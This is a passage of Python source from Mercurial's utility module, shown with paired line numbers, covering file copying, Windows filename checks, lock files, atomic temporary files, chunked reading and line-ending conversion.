1551 1549 def check(*args, **kwargs):
1552 1550 try:
1553 1551 return func(*args, **kwargs)
1554 1552 except TypeError:
1555 1553 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1556 1554 raise error.SignatureError
1557 1555 raise
1558 1556
1559 1557 return check
1560 1558
1561 1559 # a whilelist of known filesystems where hardlink works reliably
1562 1560 _hardlinkfswhitelist = {
1563 1561 'apfs',
1564 1562 'btrfs',
1565 1563 'ext2',
1566 1564 'ext3',
1567 1565 'ext4',
1568 1566 'hfs',
1569 1567 'jfs',
1570 1568 'NTFS',
1571 1569 'reiserfs',
1572 1570 'tmpfs',
1573 1571 'ufs',
1574 1572 'xfs',
1575 1573 'zfs',
1576 1574 }
1577 1575
1578 1576 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1579 1577 '''copy a file, preserving mode and optionally other stat info like
1580 1578 atime/mtime
1581 1579
1582 1580 checkambig argument is used with filestat, and is useful only if
1583 1581 destination file is guarded by any lock (e.g. repo.lock or
1584 1582 repo.wlock).
1585 1583
1586 1584 copystat and checkambig should be exclusive.
1587 1585 '''
1588 1586 assert not (copystat and checkambig)
1589 1587 oldstat = None
1590 1588 if os.path.lexists(dest):
1591 1589 if checkambig:
1592 1590 oldstat = checkambig and filestat.frompath(dest)
1593 1591 unlink(dest)
1594 1592 if hardlink:
1595 1593 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1596 1594 # unless we are confident that dest is on a whitelisted filesystem.
1597 1595 try:
1598 1596 fstype = getfstype(os.path.dirname(dest))
1599 1597 except OSError:
1600 1598 fstype = None
1601 1599 if fstype not in _hardlinkfswhitelist:
1602 1600 hardlink = False
1603 1601 if hardlink:
1604 1602 try:
1605 1603 oslink(src, dest)
1606 1604 return
1607 1605 except (IOError, OSError):
1608 1606 pass # fall back to normal copy
1609 1607 if os.path.islink(src):
1610 1608 os.symlink(os.readlink(src), dest)
1611 1609 # copytime is ignored for symlinks, but in general copytime isn't needed
1612 1610 # for them anyway
1613 1611 else:
1614 1612 try:
1615 1613 shutil.copyfile(src, dest)
1616 1614 if copystat:
1617 1615 # copystat also copies mode
1618 1616 shutil.copystat(src, dest)
1619 1617 else:
1620 1618 shutil.copymode(src, dest)
1621 1619 if oldstat and oldstat.stat:
1622 1620 newstat = filestat.frompath(dest)
1623 1621 if newstat.isambig(oldstat):
1624 1622 # stat of copied file is ambiguous to original one
1625 1623 advanced = (
1626 1624 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1627 1625 os.utime(dest, (advanced, advanced))
1628 1626 except shutil.Error as inst:
1629 1627 raise error.Abort(str(inst))
1630 1628
1631 1629 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1632 1630 """Copy a directory tree using hardlinks if possible."""
1633 1631 num = 0
1634 1632
1635 1633 gettopic = lambda: hardlink and _('linking') or _('copying')
1636 1634
1637 1635 if os.path.isdir(src):
1638 1636 if hardlink is None:
1639 1637 hardlink = (os.stat(src).st_dev ==
1640 1638 os.stat(os.path.dirname(dst)).st_dev)
1641 1639 topic = gettopic()
1642 1640 os.mkdir(dst)
1643 1641 for name, kind in listdir(src):
1644 1642 srcname = os.path.join(src, name)
1645 1643 dstname = os.path.join(dst, name)
1646 1644 def nprog(t, pos):
1647 1645 if pos is not None:
1648 1646 return progress(t, pos + num)
1649 1647 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1650 1648 num += n
1651 1649 else:
1652 1650 if hardlink is None:
1653 1651 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1654 1652 os.stat(os.path.dirname(dst)).st_dev)
1655 1653 topic = gettopic()
1656 1654
1657 1655 if hardlink:
1658 1656 try:
1659 1657 oslink(src, dst)
1660 1658 except (IOError, OSError):
1661 1659 hardlink = False
1662 1660 shutil.copy(src, dst)
1663 1661 else:
1664 1662 shutil.copy(src, dst)
1665 1663 num += 1
1666 1664 progress(topic, num)
1667 1665 progress(topic, None)
1668 1666
1669 1667 return hardlink, num
1670 1668
1671 1669 _winreservednames = {
1672 1670 'con', 'prn', 'aux', 'nul',
1673 1671 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1674 1672 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1675 1673 }
1676 1674 _winreservedchars = ':*?"<>|'
1677 1675 def checkwinfilename(path):
1678 1676 r'''Check that the base-relative path is a valid filename on Windows.
1679 1677 Returns None if the path is ok, or a UI string describing the problem.
1680 1678
1681 1679 >>> checkwinfilename(b"just/a/normal/path")
1682 1680 >>> checkwinfilename(b"foo/bar/con.xml")
1683 1681 "filename contains 'con', which is reserved on Windows"
1684 1682 >>> checkwinfilename(b"foo/con.xml/bar")
1685 1683 "filename contains 'con', which is reserved on Windows"
1686 1684 >>> checkwinfilename(b"foo/bar/xml.con")
1687 1685 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1688 1686 "filename contains 'AUX', which is reserved on Windows"
1689 1687 >>> checkwinfilename(b"foo/bar/bla:.txt")
1690 1688 "filename contains ':', which is reserved on Windows"
1691 1689 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1692 1690 "filename contains '\\x07', which is invalid on Windows"
1693 1691 >>> checkwinfilename(b"foo/bar/bla ")
1694 1692 "filename ends with ' ', which is not allowed on Windows"
1695 1693 >>> checkwinfilename(b"../bar")
1696 1694 >>> checkwinfilename(b"foo\\")
1697 1695 "filename ends with '\\', which is invalid on Windows"
1698 1696 >>> checkwinfilename(b"foo\\/bar")
1699 1697 "directory name ends with '\\', which is invalid on Windows"
1700 1698 '''
1701 1699 if path.endswith('\\'):
1702 1700 return _("filename ends with '\\', which is invalid on Windows")
1703 1701 if '\\/' in path:
1704 1702 return _("directory name ends with '\\', which is invalid on Windows")
1705 1703 for n in path.replace('\\', '/').split('/'):
1706 1704 if not n:
1707 1705 continue
1708 1706 for c in _filenamebytestr(n):
1709 1707 if c in _winreservedchars:
1710 1708 return _("filename contains '%s', which is reserved "
1711 1709 "on Windows") % c
1712 1710 if ord(c) <= 31:
1713 1711 return _("filename contains '%s', which is invalid "
1714 1712 "on Windows") % stringutil.escapestr(c)
1715 1713 base = n.split('.')[0]
1716 1714 if base and base.lower() in _winreservednames:
1717 1715 return _("filename contains '%s', which is reserved "
1718 1716 "on Windows") % base
1719 1717 t = n[-1:]
1720 1718 if t in '. ' and n not in '..':
1721 1719 return _("filename ends with '%s', which is not allowed "
1722 1720 "on Windows") % t
1723 1721
1724 1722 if pycompat.iswindows:
1725 1723 checkosfilename = checkwinfilename
1726 1724 timer = time.clock
1727 1725 else:
1728 1726 checkosfilename = platform.checkosfilename
1729 1727 timer = time.time
1730 1728
1731 1729 if safehasattr(time, "perf_counter"):
1732 1730 timer = time.perf_counter
1733 1731
1734 1732 def makelock(info, pathname):
1735 1733 """Create a lock file atomically if possible
1736 1734
1737 1735 This may leave a stale lock file if symlink isn't supported and signal
1738 1736 interrupt is enabled.
1739 1737 """
1740 1738 try:
1741 1739 return os.symlink(info, pathname)
1742 1740 except OSError as why:
1743 1741 if why.errno == errno.EEXIST:
1744 1742 raise
1745 1743 except AttributeError: # no symlink in os
1746 1744 pass
1747 1745
1748 1746 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1749 1747 ld = os.open(pathname, flags)
1750 1748 os.write(ld, info)
1751 1749 os.close(ld)
1752 1750
1753 1751 def readlock(pathname):
1754 1752 try:
1755 1753 return os.readlink(pathname)
1756 1754 except OSError as why:
1757 1755 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1758 1756 raise
1759 1757 except AttributeError: # no symlink in os
1760 1758 pass
1761 1759 fp = posixfile(pathname, 'rb')
1762 1760 r = fp.read()
1763 1761 fp.close()
1764 1762 return r
1765 1763
1766 1764 def fstat(fp):
1767 1765 '''stat file object that may not have fileno method.'''
1768 1766 try:
1769 1767 return os.fstat(fp.fileno())
1770 1768 except AttributeError:
1771 1769 return os.stat(fp.name)
1772 1770
1773 1771 # File system features
1774 1772
1775 1773 def fscasesensitive(path):
1776 1774 """
1777 1775 Return true if the given path is on a case-sensitive filesystem
1778 1776
1779 1777 Requires a path (like /foo/.hg) ending with a foldable final
1780 1778 directory component.
1781 1779 """
1782 1780 s1 = os.lstat(path)
1783 1781 d, b = os.path.split(path)
1784 1782 b2 = b.upper()
1785 1783 if b == b2:
1786 1784 b2 = b.lower()
1787 1785 if b == b2:
1788 1786 return True # no evidence against case sensitivity
1789 1787 p2 = os.path.join(d, b2)
1790 1788 try:
1791 1789 s2 = os.lstat(p2)
1792 1790 if s2 == s1:
1793 1791 return False
1794 1792 return True
1795 1793 except OSError:
1796 1794 return True
1797 1795
1798 1796 try:
1799 1797 import re2
1800 1798 _re2 = None
1801 1799 except ImportError:
1802 1800 _re2 = False
1803 1801
1804 1802 class _re(object):
1805 1803 def _checkre2(self):
1806 1804 global _re2
1807 1805 try:
1808 1806 # check if match works, see issue3964
1809 1807 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1810 1808 except ImportError:
1811 1809 _re2 = False
1812 1810
1813 1811 def compile(self, pat, flags=0):
1814 1812 '''Compile a regular expression, using re2 if possible
1815 1813
1816 1814 For best performance, use only re2-compatible regexp features. The
1817 1815 only flags from the re module that are re2-compatible are
1818 1816 IGNORECASE and MULTILINE.'''
1819 1817 if _re2 is None:
1820 1818 self._checkre2()
1821 1819 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1822 1820 if flags & remod.IGNORECASE:
1823 1821 pat = '(?i)' + pat
1824 1822 if flags & remod.MULTILINE:
1825 1823 pat = '(?m)' + pat
1826 1824 try:
1827 1825 return re2.compile(pat)
1828 1826 except re2.error:
1829 1827 pass
1830 1828 return remod.compile(pat, flags)
1831 1829
1832 1830 @propertycache
1833 1831 def escape(self):
1834 1832 '''Return the version of escape corresponding to self.compile.
1835 1833
1836 1834 This is imperfect because whether re2 or re is used for a particular
1837 1835 function depends on the flags, etc, but it's the best we can do.
1838 1836 '''
1839 1837 global _re2
1840 1838 if _re2 is None:
1841 1839 self._checkre2()
1842 1840 if _re2:
1843 1841 return re2.escape
1844 1842 else:
1845 1843 return remod.escape
1846 1844
1847 1845 re = _re()
1848 1846
1849 1847 _fspathcache = {}
1850 1848 def fspath(name, root):
1851 1849 '''Get name in the case stored in the filesystem
1852 1850
1853 1851 The name should be relative to root, and be normcase-ed for efficiency.
1854 1852
1855 1853 Note that this function is unnecessary, and should not be
1856 1854 called, for case-sensitive filesystems (simply because it's expensive).
1857 1855
1858 1856 The root should be normcase-ed, too.
1859 1857 '''
1860 1858 def _makefspathcacheentry(dir):
1861 1859 return dict((normcase(n), n) for n in os.listdir(dir))
1862 1860
1863 1861 seps = pycompat.ossep
1864 1862 if pycompat.osaltsep:
1865 1863 seps = seps + pycompat.osaltsep
1866 1864 # Protect backslashes. This gets silly very quickly.
1867 1865 seps.replace('\\','\\\\')
1868 1866 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1869 1867 dir = os.path.normpath(root)
1870 1868 result = []
1871 1869 for part, sep in pattern.findall(name):
1872 1870 if sep:
1873 1871 result.append(sep)
1874 1872 continue
1875 1873
1876 1874 if dir not in _fspathcache:
1877 1875 _fspathcache[dir] = _makefspathcacheentry(dir)
1878 1876 contents = _fspathcache[dir]
1879 1877
1880 1878 found = contents.get(part)
1881 1879 if not found:
1882 1880 # retry "once per directory" per "dirstate.walk" which
1883 1881 # may take place for each patches of "hg qpush", for example
1884 1882 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1885 1883 found = contents.get(part)
1886 1884
1887 1885 result.append(found or part)
1888 1886 dir = os.path.join(dir, part)
1889 1887
1890 1888 return ''.join(result)
1891 1889
1892 1890 def checknlink(testfile):
1893 1891 '''check whether hardlink count reporting works properly'''
1894 1892
1895 1893 # testfile may be open, so we need a separate file for checking to
1896 1894 # work around issue2543 (or testfile may get lost on Samba shares)
1897 1895 f1, f2, fp = None, None, None
1898 1896 try:
1899 1897 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1900 1898 suffix='1~', dir=os.path.dirname(testfile))
1901 1899 os.close(fd)
1902 1900 f2 = '%s2~' % f1[:-2]
1903 1901
1904 1902 oslink(f1, f2)
1905 1903 # nlinks() may behave differently for files on Windows shares if
1906 1904 # the file is open.
1907 1905 fp = posixfile(f2)
1908 1906 return nlinks(f2) > 1
1909 1907 except OSError:
1910 1908 return False
1911 1909 finally:
1912 1910 if fp is not None:
1913 1911 fp.close()
1914 1912 for f in (f1, f2):
1915 1913 try:
1916 1914 if f is not None:
1917 1915 os.unlink(f)
1918 1916 except OSError:
1919 1917 pass
1920 1918
1921 1919 def endswithsep(path):
1922 1920 '''Check path ends with os.sep or os.altsep.'''
1923 1921 return (path.endswith(pycompat.ossep)
1924 1922 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1925 1923
1926 1924 def splitpath(path):
1927 1925 '''Split path by os.sep.
1928 1926 Note that this function does not use os.altsep because this is
1929 1927 an alternative of simple "xxx.split(os.sep)".
1930 1928 It is recommended to use os.path.normpath() before using this
1931 1929 function if need.'''
1932 1930 return path.split(pycompat.ossep)
1933 1931
1934 1932 def mktempcopy(name, emptyok=False, createmode=None):
1935 1933 """Create a temporary file with the same contents from name
1936 1934
1937 1935 The permission bits are copied from the original file.
1938 1936
1939 1937 If the temporary file is going to be truncated immediately, you
1940 1938 can use emptyok=True as an optimization.
1941 1939
1942 1940 Returns the name of the temporary file.
1943 1941 """
1944 1942 d, fn = os.path.split(name)
1945 1943 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1946 1944 os.close(fd)
1947 1945 # Temporary files are created with mode 0600, which is usually not
1948 1946 # what we want. If the original file already exists, just copy
1949 1947 # its mode. Otherwise, manually obey umask.
1950 1948 copymode(name, temp, createmode)
1951 1949 if emptyok:
1952 1950 return temp
1953 1951 try:
1954 1952 try:
1955 1953 ifp = posixfile(name, "rb")
1956 1954 except IOError as inst:
1957 1955 if inst.errno == errno.ENOENT:
1958 1956 return temp
1959 1957 if not getattr(inst, 'filename', None):
1960 1958 inst.filename = name
1961 1959 raise
1962 1960 ofp = posixfile(temp, "wb")
1963 1961 for chunk in filechunkiter(ifp):
1964 1962 ofp.write(chunk)
1965 1963 ifp.close()
1966 1964 ofp.close()
1967 1965 except: # re-raises
1968 1966 try:
1969 1967 os.unlink(temp)
1970 1968 except OSError:
1971 1969 pass
1972 1970 raise
1973 1971 return temp
1974 1972
1975 1973 class filestat(object):
1976 1974 """help to exactly detect change of a file
1977 1975
1978 1976 'stat' attribute is result of 'os.stat()' if specified 'path'
1979 1977 exists. Otherwise, it is None. This can avoid preparative
1980 1978 'exists()' examination on client side of this class.
1981 1979 """
1982 1980 def __init__(self, stat):
1983 1981 self.stat = stat
1984 1982
1985 1983 @classmethod
1986 1984 def frompath(cls, path):
1987 1985 try:
1988 1986 stat = os.stat(path)
1989 1987 except OSError as err:
1990 1988 if err.errno != errno.ENOENT:
1991 1989 raise
1992 1990 stat = None
1993 1991 return cls(stat)
1994 1992
1995 1993 @classmethod
1996 1994 def fromfp(cls, fp):
1997 1995 stat = os.fstat(fp.fileno())
1998 1996 return cls(stat)
1999 1997
2000 1998 __hash__ = object.__hash__
2001 1999
2002 2000 def __eq__(self, old):
2003 2001 try:
2004 2002 # if ambiguity between stat of new and old file is
2005 2003 # avoided, comparison of size, ctime and mtime is enough
2006 2004 # to exactly detect change of a file regardless of platform
2007 2005 return (self.stat.st_size == old.stat.st_size and
2008 2006 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2009 2007 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2010 2008 except AttributeError:
2011 2009 pass
2012 2010 try:
2013 2011 return self.stat is None and old.stat is None
2014 2012 except AttributeError:
2015 2013 return False
2016 2014
2017 2015 def isambig(self, old):
2018 2016 """Examine whether new (= self) stat is ambiguous against old one
2019 2017
2020 2018 "S[N]" below means stat of a file at N-th change:
2021 2019
2022 2020 - S[n-1].ctime < S[n].ctime: can detect change of a file
2023 2021 - S[n-1].ctime == S[n].ctime
2024 2022 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2025 2023 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2026 2024 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2027 2025 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2028 2026
2029 2027 Case (*2) above means that a file was changed twice or more at
2030 2028 same time in sec (= S[n-1].ctime), and comparison of timestamp
2031 2029 is ambiguous.
2032 2030
2033 2031 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2034 2032 timestamp is ambiguous".
2035 2033
2036 2034 But advancing mtime only in case (*2) doesn't work as
2037 2035 expected, because naturally advanced S[n].mtime in case (*1)
2038 2036 might be equal to manually advanced S[n-1 or earlier].mtime.
2039 2037
2040 2038 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2041 2039 treated as ambiguous regardless of mtime, to avoid overlooking
2042 2040 by confliction between such mtime.
2043 2041
2044 2042 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2045 2043 S[n].mtime", even if size of a file isn't changed.
2046 2044 """
2047 2045 try:
2048 2046 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2049 2047 except AttributeError:
2050 2048 return False
2051 2049
2052 2050 def avoidambig(self, path, old):
2053 2051 """Change file stat of specified path to avoid ambiguity
2054 2052
2055 2053 'old' should be previous filestat of 'path'.
2056 2054
2057 2055 This skips avoiding ambiguity, if a process doesn't have
2058 2056 appropriate privileges for 'path'. This returns False in this
2059 2057 case.
2060 2058
2061 2059 Otherwise, this returns True, as "ambiguity is avoided".
2062 2060 """
2063 2061 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2064 2062 try:
2065 2063 os.utime(path, (advanced, advanced))
2066 2064 except OSError as inst:
2067 2065 if inst.errno == errno.EPERM:
2068 2066 # utime() on the file created by another user causes EPERM,
2069 2067 # if a process doesn't have appropriate privileges
2070 2068 return False
2071 2069 raise
2072 2070 return True
2073 2071
2074 2072 def __ne__(self, other):
2075 2073 return not self == other
2076 2074
2077 2075 class atomictempfile(object):
2078 2076 '''writable file object that atomically updates a file
2079 2077
2080 2078 All writes will go to a temporary copy of the original file. Call
2081 2079 close() when you are done writing, and atomictempfile will rename
2082 2080 the temporary copy to the original name, making the changes
2083 2081 visible. If the object is destroyed without being closed, all your
2084 2082 writes are discarded.
2085 2083
2086 2084 checkambig argument of constructor is used with filestat, and is
2087 2085 useful only if target file is guarded by any lock (e.g. repo.lock
2088 2086 or repo.wlock).
2089 2087 '''
2090 2088 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2091 2089 self.__name = name # permanent name
2092 2090 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2093 2091 createmode=createmode)
2094 2092 self._fp = posixfile(self._tempname, mode)
2095 2093 self._checkambig = checkambig
2096 2094
2097 2095 # delegated methods
2098 2096 self.read = self._fp.read
2099 2097 self.write = self._fp.write
2100 2098 self.seek = self._fp.seek
2101 2099 self.tell = self._fp.tell
2102 2100 self.fileno = self._fp.fileno
2103 2101
2104 2102 def close(self):
2105 2103 if not self._fp.closed:
2106 2104 self._fp.close()
2107 2105 filename = localpath(self.__name)
2108 2106 oldstat = self._checkambig and filestat.frompath(filename)
2109 2107 if oldstat and oldstat.stat:
2110 2108 rename(self._tempname, filename)
2111 2109 newstat = filestat.frompath(filename)
2112 2110 if newstat.isambig(oldstat):
2113 2111 # stat of changed file is ambiguous to original one
2114 2112 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2115 2113 os.utime(filename, (advanced, advanced))
2116 2114 else:
2117 2115 rename(self._tempname, filename)
2118 2116
2119 2117 def discard(self):
2120 2118 if not self._fp.closed:
2121 2119 try:
2122 2120 os.unlink(self._tempname)
2123 2121 except OSError:
2124 2122 pass
2125 2123 self._fp.close()
2126 2124
2127 2125 def __del__(self):
2128 2126 if safehasattr(self, '_fp'): # constructor actually did something
2129 2127 self.discard()
2130 2128
2131 2129 def __enter__(self):
2132 2130 return self
2133 2131
2134 2132 def __exit__(self, exctype, excvalue, traceback):
2135 2133 if exctype is not None:
2136 2134 self.discard()
2137 2135 else:
2138 2136 self.close()
2139 2137
2140 2138 def unlinkpath(f, ignoremissing=False):
2141 2139 """unlink and remove the directory if it is empty"""
2142 2140 if ignoremissing:
2143 2141 tryunlink(f)
2144 2142 else:
2145 2143 unlink(f)
2146 2144 # try removing directories that might now be empty
2147 2145 try:
2148 2146 removedirs(os.path.dirname(f))
2149 2147 except OSError:
2150 2148 pass
2151 2149
2152 2150 def tryunlink(f):
2153 2151 """Attempt to remove a file, ignoring ENOENT errors."""
2154 2152 try:
2155 2153 unlink(f)
2156 2154 except OSError as e:
2157 2155 if e.errno != errno.ENOENT:
2158 2156 raise
2159 2157
2160 2158 def makedirs(name, mode=None, notindexed=False):
2161 2159 """recursive directory creation with parent mode inheritance
2162 2160
2163 2161 Newly created directories are marked as "not to be indexed by
2164 2162 the content indexing service", if ``notindexed`` is specified
2165 2163 for "write" mode access.
2166 2164 """
2167 2165 try:
2168 2166 makedir(name, notindexed)
2169 2167 except OSError as err:
2170 2168 if err.errno == errno.EEXIST:
2171 2169 return
2172 2170 if err.errno != errno.ENOENT or not name:
2173 2171 raise
2174 2172 parent = os.path.dirname(os.path.abspath(name))
2175 2173 if parent == name:
2176 2174 raise
2177 2175 makedirs(parent, mode, notindexed)
2178 2176 try:
2179 2177 makedir(name, notindexed)
2180 2178 except OSError as err:
2181 2179 # Catch EEXIST to handle races
2182 2180 if err.errno == errno.EEXIST:
2183 2181 return
2184 2182 raise
2185 2183 if mode is not None:
2186 2184 os.chmod(name, mode)
2187 2185
2188 2186 def readfile(path):
2189 2187 with open(path, 'rb') as fp:
2190 2188 return fp.read()
2191 2189
2192 2190 def writefile(path, text):
2193 2191 with open(path, 'wb') as fp:
2194 2192 fp.write(text)
2195 2193
2196 2194 def appendfile(path, text):
2197 2195 with open(path, 'ab') as fp:
2198 2196 fp.write(text)
2199 2197
2200 2198 class chunkbuffer(object):
2201 2199 """Allow arbitrary sized chunks of data to be efficiently read from an
2202 2200 iterator over chunks of arbitrary size."""
2203 2201
2204 2202 def __init__(self, in_iter):
2205 2203 """in_iter is the iterator that's iterating over the input chunks."""
2206 2204 def splitbig(chunks):
2207 2205 for chunk in chunks:
2208 2206 if len(chunk) > 2**20:
2209 2207 pos = 0
2210 2208 while pos < len(chunk):
2211 2209 end = pos + 2 ** 18
2212 2210 yield chunk[pos:end]
2213 2211 pos = end
2214 2212 else:
2215 2213 yield chunk
2216 2214 self.iter = splitbig(in_iter)
2217 2215 self._queue = collections.deque()
2218 2216 self._chunkoffset = 0
2219 2217
2220 2218 def read(self, l=None):
2221 2219 """Read L bytes of data from the iterator of chunks of data.
2222 2220 Returns less than L bytes if the iterator runs dry.
2223 2221
2224 2222 If size parameter is omitted, read everything"""
2225 2223 if l is None:
2226 2224 return ''.join(self.iter)
2227 2225
2228 2226 left = l
2229 2227 buf = []
2230 2228 queue = self._queue
2231 2229 while left > 0:
2232 2230 # refill the queue
2233 2231 if not queue:
2234 2232 target = 2**18
2235 2233 for chunk in self.iter:
2236 2234 queue.append(chunk)
2237 2235 target -= len(chunk)
2238 2236 if target <= 0:
2239 2237 break
2240 2238 if not queue:
2241 2239 break
2242 2240
2243 2241 # The easy way to do this would be to queue.popleft(), modify the
2244 2242 # chunk (if necessary), then queue.appendleft(). However, for cases
2245 2243 # where we read partial chunk content, this incurs 2 dequeue
2246 2244 # mutations and creates a new str for the remaining chunk in the
2247 2245 # queue. Our code below avoids this overhead.
2248 2246
2249 2247 chunk = queue[0]
2250 2248 chunkl = len(chunk)
2251 2249 offset = self._chunkoffset
2252 2250
2253 2251 # Use full chunk.
2254 2252 if offset == 0 and left >= chunkl:
2255 2253 left -= chunkl
2256 2254 queue.popleft()
2257 2255 buf.append(chunk)
2258 2256 # self._chunkoffset remains at 0.
2259 2257 continue
2260 2258
2261 2259 chunkremaining = chunkl - offset
2262 2260
2263 2261 # Use all of unconsumed part of chunk.
2264 2262 if left >= chunkremaining:
2265 2263 left -= chunkremaining
2266 2264 queue.popleft()
2267 2265 # offset == 0 is enabled by block above, so this won't merely
2268 2266 # copy via ``chunk[0:]``.
2269 2267 buf.append(chunk[offset:])
2270 2268 self._chunkoffset = 0
2271 2269
2272 2270 # Partial chunk needed.
2273 2271 else:
2274 2272 buf.append(chunk[offset:offset + left])
2275 2273 self._chunkoffset += left
2276 2274 left -= chunkremaining
2277 2275
2278 2276 return ''.join(buf)
2279 2277
2280 2278 def filechunkiter(f, size=131072, limit=None):
2281 2279 """Create a generator that produces the data in the file size
2282 2280 (default 131072) bytes at a time, up to optional limit (default is
2283 2281 to read all data). Chunks may be less than size bytes if the
2284 2282 chunk is the last chunk in the file, or the file is a socket or
2285 2283 some other type of file that sometimes reads less data than is
2286 2284 requested."""
2287 2285 assert size >= 0
2288 2286 assert limit is None or limit >= 0
2289 2287 while True:
2290 2288 if limit is None:
2291 2289 nbytes = size
2292 2290 else:
2293 2291 nbytes = min(limit, size)
2294 2292 s = nbytes and f.read(nbytes)
2295 2293 if not s:
2296 2294 break
2297 2295 if limit:
2298 2296 limit -= len(s)
2299 2297 yield s
2300 2298
2301 2299 class cappedreader(object):
2302 2300 """A file object proxy that allows reading up to N bytes.
2303 2301
2304 2302 Given a source file object, instances of this type allow reading up to
2305 2303 N bytes from that source file object. Attempts to read past the allowed
2306 2304 limit are treated as EOF.
2307 2305
2308 2306 It is assumed that I/O is not performed on the original file object
2309 2307 in addition to I/O that is performed by this instance. If there is,
2310 2308 state tracking will get out of sync and unexpected results will ensue.
2311 2309 """
2312 2310 def __init__(self, fh, limit):
2313 2311 """Allow reading up to <limit> bytes from <fh>."""
2314 2312 self._fh = fh
2315 2313 self._left = limit
2316 2314
2317 2315 def read(self, n=-1):
2318 2316 if not self._left:
2319 2317 return b''
2320 2318
2321 2319 if n < 0:
2322 2320 n = self._left
2323 2321
2324 2322 data = self._fh.read(min(n, self._left))
2325 2323 self._left -= len(data)
2326 2324 assert self._left >= 0
2327 2325
2328 2326 return data
2329 2327
2330 2328 def readinto(self, b):
2331 2329 res = self.read(len(b))
2332 2330 if res is None:
2333 2331 return None
2334 2332
2335 2333 b[0:len(res)] = res
2336 2334 return len(res)
2337 2335
2338 2336 def unitcountfn(*unittable):
2339 2337 '''return a function that renders a readable count of some quantity'''
2340 2338
2341 2339 def go(count):
2342 2340 for multiplier, divisor, format in unittable:
2343 2341 if abs(count) >= divisor * multiplier:
2344 2342 return format % (count / float(divisor))
2345 2343 return unittable[-1][2] % count
2346 2344
2347 2345 return go
2348 2346
2349 2347 def processlinerange(fromline, toline):
2350 2348 """Check that linerange <fromline>:<toline> makes sense and return a
2351 2349 0-based range.
2352 2350
2353 2351 >>> processlinerange(10, 20)
2354 2352 (9, 20)
2355 2353 >>> processlinerange(2, 1)
2356 2354 Traceback (most recent call last):
2357 2355 ...
2358 2356 ParseError: line range must be positive
2359 2357 >>> processlinerange(0, 5)
2360 2358 Traceback (most recent call last):
2361 2359 ...
2362 2360 ParseError: fromline must be strictly positive
2363 2361 """
2364 2362 if toline - fromline < 0:
2365 2363 raise error.ParseError(_("line range must be positive"))
2366 2364 if fromline < 1:
2367 2365 raise error.ParseError(_("fromline must be strictly positive"))
2368 2366 return fromline - 1, toline
2369 2367
2370 2368 bytecount = unitcountfn(
2371 2369 (100, 1 << 30, _('%.0f GB')),
2372 2370 (10, 1 << 30, _('%.1f GB')),
2373 2371 (1, 1 << 30, _('%.2f GB')),
2374 2372 (100, 1 << 20, _('%.0f MB')),
2375 2373 (10, 1 << 20, _('%.1f MB')),
2376 2374 (1, 1 << 20, _('%.2f MB')),
2377 2375 (100, 1 << 10, _('%.0f KB')),
2378 2376 (10, 1 << 10, _('%.1f KB')),
2379 2377 (1, 1 << 10, _('%.2f KB')),
2380 2378 (1, 1, _('%.0f bytes')),
2381 2379 )
2382 2380
2383 2381 class transformingwriter(object):
2384 2382 """Writable file wrapper to transform data by function"""
2385 2383
2386 2384 def __init__(self, fp, encode):
2387 2385 self._fp = fp
2388 2386 self._encode = encode
2389 2387
2390 2388 def close(self):
2391 2389 self._fp.close()
2392 2390
2393 2391 def flush(self):
2394 2392 self._fp.flush()
2395 2393
2396 2394 def write(self, data):
2397 2395 return self._fp.write(self._encode(data))
2398 2396
2399 2397 # Matches a single EOL which can either be a CRLF where repeated CR
2400 2398 # are removed or a LF. We do not care about old Macintosh files, so a
2401 2399 # stray CR is an error.
2402 2400 _eolre = remod.compile(br'\r*\n')
2403 2401
2404 2402 def tolf(s):
2405 2403 return _eolre.sub('\n', s)
2406 2404
2407 2405 def tocrlf(s):
2408 2406 return _eolre.sub('\r\n', s)
2409 2407
2410 2408 def _crlfwriter(fp):
2411 2409 return transformingwriter(fp, tocrlf)
2412 2410
2413 2411 if pycompat.oslinesep == '\r\n':
2414 2412 tonativeeol = tocrlf
2415 2413 fromnativeeol = tolf
2416 2414 nativeeolwriter = _crlfwriter
2417 2415 else:
2418 2416 tonativeeol = pycompat.identity
2419 2417 fromnativeeol = pycompat.identity
2420 2418 nativeeolwriter = pycompat.identity
2421 2419
2422 2420 if (pyplatform.python_implementation() == 'CPython' and
2423 2421 sys.version_info < (3, 0)):
2424 2422 # There is an issue in CPython that some IO methods do not handle EINTR
